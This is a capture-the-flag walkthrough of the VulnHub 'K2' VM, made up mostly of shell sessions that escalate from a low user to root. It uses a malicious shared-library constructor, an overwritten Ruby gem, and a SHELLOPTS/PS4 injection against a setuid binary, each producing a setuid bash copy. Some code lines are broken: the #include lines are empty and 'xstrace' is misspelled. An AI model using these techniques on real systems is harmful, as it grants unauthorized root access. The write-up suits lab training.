K2 VM (VULNHUB)

VM LINK : https://download.vulnhub.com/devrandom/K2.ova

root@kali:~# netdiscover -i eth0

Currently scanning: 192.168.69.0/16 | Screen View: Unique Hosts

15 Captured ARP Req/Rep packets, from 5 hosts. Total size: 900
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.23.2 00:50:56:f6:84:83 2 120 VMware, Inc.
192.168.23.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.23.140 00:0c:29:7e:f6:12 10 600 VMware, Inc.
192.168.23.142 00:0c:29:85:81:b4 1 60 VMware, Inc.
192.168.23.254 00:50:56:fb:32:c4 1 60 VMware, Inc.

root@kali:~# ssh user@192.168.23.142
The authenticity of host ‘192.168.23.142 (192.168.23.142)’ can’t be established.
ECDSA key fingerprint is SHA256:Vkq0eoP2Xwd9t69tf5fQkO4l+df05Ff4AXu61O8Avfs.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.23.142’ (ECDSA) to the list of known hosts.
user@192.168.23.142’s password: password
Last failed login: Sun Jun 25 02:30:44 EDT 2017 from 10.1.0.16 on ssh:notty
There were 2 failed login attempts since the last successful login.
[user@localhost ~]$

[user@localhost ~]$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on this host:
!visiblepw, always_set_home, env_reset, env_keep=”COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS”, env_keep+=”MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE”, env_keep+=”LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES”, env_keep+=”LC_MONETARY LC_NAME
LC_NUMERIC LC_PAPER LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY”,
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User user may run the following commands on this host:
(user2) /bin/calc
[user@localhost ~]$

[user@localhost ~]$ ls -al /home/
total 0
drwxr-xr-x. 4 root root 31 Aug 30 2017 .
dr-xr-xr-x. 17 root root 224 Aug 30 2017 ..
drwx——. 2 user user 83 Aug 30 2017 user
drwx——. 2 user2 user2 83 Aug 30 2017 user2

[user@localhost ~]$ chmod +rx /home/user
[user@localhost ~]$ mkdir /home/user/.config
[user@localhost ~]$ cd /home/user/.config/

[user@localhost .config]$ vi libcalc.c

[user@localhost .config]$ cat libcalc.c
#include
#include

static void x() __attribute__((constructor));

void x() {
system(“cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p”);
}

[user@localhost .config]$ gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
[user@localhost .config]$ sudo -u user2 /bin/calc
[sudo] password for user:
Calculating something, please wait…

[user2@localhost .config]$ cat /sbin/bckup
#!/usr/bin/env ruby

require ‘rubygems’
require ‘zip’

directory = ‘/etc/firewalld/’
zipfile_name = ‘/tmp/firewalld-backup.zip’

File.delete(zipfile_name) if File::exists?(zipfile_name)
Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|
Dir[File.join(directory, ‘**’, ‘**’)].each do |file|
zipfile.add(file.sub(directory, ”), file)
end
end

[user2@localhost .config]$ gem which zip
/usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
[user2@localhost .config]$ ls -la /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb
-rw-rw-r–. 1 root user2 1621 Aug 30 2017 /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb

[user2@localhost .config]$ echo ‘`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`’ > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb

[user2@localhost tmp]$ cd /tmp/

[user2@localhost tmp]$ ls -al
total 1884
drwxrwxrwt. 7 root root 146 Sep 15 09:27 .
dr-xr-xr-x. 17 root root 224 Aug 30 2017 ..
-rwsr-sr-x. 1 user2 user2 960472 Sep 15 09:24 bash
-rwsr-sr-x. 1 user2 user2 960472 Sep 15 09:27 bash2
-rw-r–r–. 1 user3 user3 22 Sep 15 09:27 firewalld-backup.zip
drwxrwxrwt. 2 root root 6 Aug 30 2017 .font-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .ICE-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .Test-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .X11-unix
drwxrwxrwt. 2 root root 6 Aug 30 2017 .XIM-unix

[user2@localhost tmp]$ ./bash2

bash2-4.2$

[user2@localhost tmp]$ id

bash2-4.2$ id
uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

bash2-4.2$ cd /tmp
bash2-4.2$ cat bash3.c
int main()
{ setreuid(geteuid(),getuid());
setregid(getegid(),getgid());
system(“/bin/bash”);
}

bash2-4.2$ gcc bash3.c -o bash3
bash2-4.2$ ./bash3

bash2-4.2$ id
uid=1001(user2) gid=1001(user2) groups=1001(user2) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

bash2-4.2$ find / -perm -4000 2>/dev/null
/tmp/bash
/tmp/bash2
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib64/dbus-1/dbus-daemon-launch-helper
/usr/local/bin/whoisme

bash2-4.2$ ls -al /usr/local/bin/whoisme
-rwsr-xr–. 1 root user3 8616 Aug 30 2017 /usr/local/bin/whoisme

bash2-4.2$ env -i SHELLOPTS=xstrace PS4=’$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)’ /bin/sh -c ‘/usr/local/bin/whoisme’

bash2-4.2$ ls -al

bash2-4.2$ ./bash4 -p

bash2-4.2# id

bash2-4.2# cd /root/

bash2-4.2# ls -al

bash2-4.2# cat flag.txt

@SAKSHAM DIXIT